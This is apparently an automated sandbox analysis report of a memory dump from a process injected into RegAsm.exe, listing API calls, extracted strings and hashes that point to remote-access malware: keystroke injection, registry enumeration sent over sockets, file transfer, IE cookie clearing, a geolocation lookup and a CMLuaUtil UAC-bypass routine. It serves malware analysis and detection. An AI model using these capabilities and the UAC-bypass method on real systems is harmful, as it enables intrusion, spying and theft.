                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                        • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                        • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                        • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                        • __freea.LIBCMT ref: 00454083
                                                                                                        • __freea.LIBCMT ref: 0045408F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 201697637-0
                                                                                                        • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                        • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                        • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                        • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                        APIs
                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                        • _free.LIBCMT ref: 00445515
                                                                                                        • _free.LIBCMT ref: 0044552E
                                                                                                        • _free.LIBCMT ref: 00445560
                                                                                                        • _free.LIBCMT ref: 00445569
                                                                                                        • _free.LIBCMT ref: 00445575
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                        • String ID: C
                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                        • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                        • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                        • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                        • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tcp$udp
                                                                                                        • API String ID: 0-3725065008
                                                                                                        • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                        • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                        • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                        • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                        • String ID: PkG$XMG$NG$NG
                                                                                                        • API String ID: 1649129571-3151166067
                                                                                                        • Opcode ID: aacd7a579f6332a1803637cb92cd800e27fe309d04699a5eefac6a2d04bcc729
                                                                                                        • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                        • Opcode Fuzzy Hash: aacd7a579f6332a1803637cb92cd800e27fe309d04699a5eefac6a2d04bcc729
                                                                                                        • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                        • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                        • String ID: .part
                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                        • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                        • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                        • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                        • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                        APIs
                                                                                                        • SendInput.USER32 ref: 00419A25
                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                        • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                          • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InputSend$Virtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 1167301434-0
                                                                                                        • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                        • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                        • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                        • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16_free
                                                                                                        • String ID: a/p$am/pm$h{D
                                                                                                        • API String ID: 2936374016-2303565833
                                                                                                        • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                        • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                        • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                                                                                                        • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                        APIs
                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                        • _free.LIBCMT ref: 00444E87
                                                                                                        • _free.LIBCMT ref: 00444E9E
                                                                                                        • _free.LIBCMT ref: 00444EBD
                                                                                                        • _free.LIBCMT ref: 00444ED8
                                                                                                        • _free.LIBCMT ref: 00444EEF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$AllocateHeap
                                                                                                        • String ID: KED
                                                                                                        • API String ID: 3033488037-2133951994
                                                                                                        • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                        • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                        • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                                                                                                        • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                        APIs
                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                        • String ID: [regsplt]$xUG$TG
                                                                                                        • API String ID: 3554306468-1165877943
                                                                                                        • Opcode ID: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                                                                        • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                                        • Opcode Fuzzy Hash: 4010ce4c5e7b861f3456ebae9656c6ef2fa6e35e8f0dda585fb92aeaae03829d
                                                                                                        • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                                        APIs
                                                                                                        • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                        • __fassign.LIBCMT ref: 0044B4F9
                                                                                                        • __fassign.LIBCMT ref: 0044B514
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1324828854-0
                                                                                                        • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                        • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                        • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                        • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                                                                          • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                          • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                                                                        • String ID: xUG$NG$NG$TG
                                                                                                        • API String ID: 3114080316-2811732169
                                                                                                        • Opcode ID: 125191a5a3a88556e3a69c6cf09a9dc86603abc94475edb19000bab933f72620
                                                                                                        • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                                                                        • Opcode Fuzzy Hash: 125191a5a3a88556e3a69c6cf09a9dc86603abc94475edb19000bab933f72620
                                                                                                        • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                                                                        APIs
                                                                                                          • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                          • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                          • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                        • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                        • API String ID: 37874593-122982132
                                                                                                        • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                        • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                        • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                        • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                        APIs
                                                                                                          • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                          • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                          • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                        • Opcode ID: b9c60e82bbbca7737c419c9b7d33d4a319c1a0651c494f32b3451364f95243c4
                                                                                                        • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                        • Opcode Fuzzy Hash: b9c60e82bbbca7737c419c9b7d33d4a319c1a0651c494f32b3451364f95243c4
                                                                                                        • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                        • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                        • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                        • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                        Strings
                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                        • API String ID: 3121278467-91888290
                                                                                                        • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                                                                        • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                        • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                                                                        • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                        APIs
                                                                                                          • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                        • _free.LIBCMT ref: 00450FC8
                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                        • _free.LIBCMT ref: 00450FD3
                                                                                                        • _free.LIBCMT ref: 00450FDE
                                                                                                        • _free.LIBCMT ref: 00451032
                                                                                                        • _free.LIBCMT ref: 0045103D
                                                                                                        • _free.LIBCMT ref: 00451048
                                                                                                        • _free.LIBCMT ref: 00451053
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                        • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                        • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                        • int.LIBCPMT ref: 004111BE
                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                        • String ID: (mG
                                                                                                        • API String ID: 2536120697-4059303827
                                                                                                        • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                        • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                        • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                        • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                        • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                        • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                        • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                        • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                        APIs
                                                                                                        • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                          • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                          • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                        • CoUninitialize.OLE32 ref: 00407664
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                        • API String ID: 3851391207-1839356972
                                                                                                        • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
